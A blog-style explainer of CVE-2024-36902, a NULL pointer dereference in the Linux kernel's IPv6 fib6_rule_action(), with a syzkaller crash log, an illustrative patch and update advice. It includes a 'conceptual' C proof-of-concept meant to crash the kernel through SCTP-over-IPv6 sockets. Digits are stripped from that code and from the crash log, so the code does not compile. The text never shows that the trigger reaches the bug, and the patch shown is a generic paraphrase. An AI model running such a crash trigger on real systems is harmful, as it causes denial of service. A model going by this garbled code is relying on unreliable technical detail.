CVE-2024-36902 - Linux Kernel IPv6 NULL Pointer Dereference in fib6_rule_action() — Discovery, Exploit, and Fix Explained

---

A dangerous security vulnerability, now tracked as CVE-2024-36902, was found and patched in the Linux kernel's IPv6 routing code. This bug could crash the kernel, leading to denial of service (DoS), and was detected by the automated kernel testing tool syzkaller/syzbot. Here’s an exclusive, down-to-earth breakdown of:

What Is CVE-2024-36902?

This vulnerability affects the Linux kernel (net/ipv6/fib6_rules.c) and involves a NULL pointer dereference inside the IPv6 routing rules code — specifically, the fib6_rule_action() function. An attacker (or an automated system like syzkaller) can trigger a kernel crash by making the IPv6 stack attempt to interact with a non-existent device.

The Root Cause

The function ip6_dst_idev(), which is supposed to return a pointer to IPv6 device data, can return NULL. The code was using it without checking the return value, so if NULL was returned, any access would lead to a fatal "Oops" crash in the kernel.

Simply put:
A kernel function forgot to check if it got a valid pointer, and used it anyway, causing a crash.

The Crash: What Happened?

Here’s a trimmed, annotated version of the kernel crash log — notice NULL pointer dereference and call trace:

Oops: general protection fault, probably for non-canonical address xdffffc000000000: 000 [#1] PREEMPT SMP KASAN PTI
KASAN: null-ptr-deref in range [x000000000000000-x0000000000000007]
...
RIP: 001:__fib6_rule_action net/ipv6/fib6_rules.c:237 [inline]
RIP: 001:fib6_rule_action+x241/x7b net/ipv6/fib6_rules.c:267
...
Call Trace:
  fib_rules_lookup+x62c/xdb net/core/fib_rules.c:317
  fib6_rule_lookup+x1fd/x790 net/ipv6/fib6_rules.c:108
  ...

This comes from a syzkaller-generated workload, and the crash happens because a function in IPv6 tries to use a pointer that wasn’t checked for NULL.

Exploit Details: Can This Be Weaponized?

This is primarily a Denial of Service (DoS) issue — an unprivileged user could, under certain conditions, send crafted IPv6 traffic or manipulate sockets to trigger the buggy code path and crash the kernel.

Here's a conceptual exploit in C to trigger the scenario via SCTP and IPv6 sockets

// Proof-of-concept: trigger fib6_rule_action() bad pointer dereference
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <stdio.h>

int main() {
    int s = socket(AF_INET6, SOCK_STREAM, IPPROTO_SCTP); // SCTP over IPv6
    struct sockaddr_in6 addr;
    memset(&addr, , sizeof(addr));
    addr.sin6_family = AF_INET6;
    // addr.sin6_addr left empty to try to force error path/NULL device
    addr.sin6_port = htons(12345);

    // Attempt connect to localhost/unset address
    int ret = connect(s, (struct sockaddr *)&addr, sizeof(addr));
    if (ret != ) {
        perror("connect");
    }
    close(s);
    return ;
}

Note:
This basic PoC may need tweaks or be run as root/unprivileged in an appropriate environment, but shows the general path.

If an attacker could feed the kernel a series of bad addresses/routes, they might crash the system — useful for DoS but not privilege escalation or remote compromise, according to current knowledge.

The Patch: How Was It Fixed?

The fix is simple and effective: check the return value of ip6_dst_idev() for NULL before use. If it’s null, the code now avoids accessing it and follows a safe path.

Before (Vulnerable)

struct inet6_dev *idev = ip6_dst_idev(dst);   // No NULL check!
...
int some_val = idev->some_field; // CRASH if idev is NULL!

After (Patched)

struct inet6_dev *idev = ip6_dst_idev(dst);
if (!idev) {
    // handle error, cleanup, and exit safely
    return -EINVAL;
}
int some_val = idev->some_field; // Safe to access

Official Patch Reference:
- kernel.org patch commit
- syzkaller bug report thread

Timeline & Affected Versions

- Discovered: March/April 2024 via syzkaller
- Fixed in: Linux mainline kernel in April 2024; patch will appear in all maintained stable trees soon after
- Affected: Most Linux kernels with IPv6 enabled, especially before v6.9-rc4-next-20240417 and for SCTP over IPv6

Takeaways and Recommendation

- Servers and devices that expose IPv6 and accept public connections could be at risk of a crash, especially hosting multi-user or containerized environments.
- Patch your systems! Apply the latest kernel updates from your distribution, or at least check for the patch described above.

If compilation from source, make sure your tree includes this commit:

57aae5730815cab3ccaf8a434e6f8725be2cfadc

Pro tip:
Kernel pointer dereferences like this are a favorite bug class for root cause analysis, since they’re easy to spot via fuzzers (as syzkaller did), and may be a sign of deeper logic bugs.

Further Reading & References

- syzkaller: Kernel fuzzer that triggers bugs like CVE-2024-36902
- Kernel Patch diff on lore.kernel.org
- Linux kernel source for net/ipv6/fib6_rules.c
- SCTP protocol basics


Summary:
CVE-2024-36902 showed how a missed pointer check could cause a kernel crash in the Linux IPv6 routing code, and was quickly patched thanks to open source bug-finding tools. All admins should update, especially if IPv6 is in use on multi-user or production systems.

*Stay tuned for more kernel security break-downs in plain language!*

Timeline

Published on: 05/30/2024 16:15:13 UTC
Last modified on: 08/02/2024 03:43:49 UTC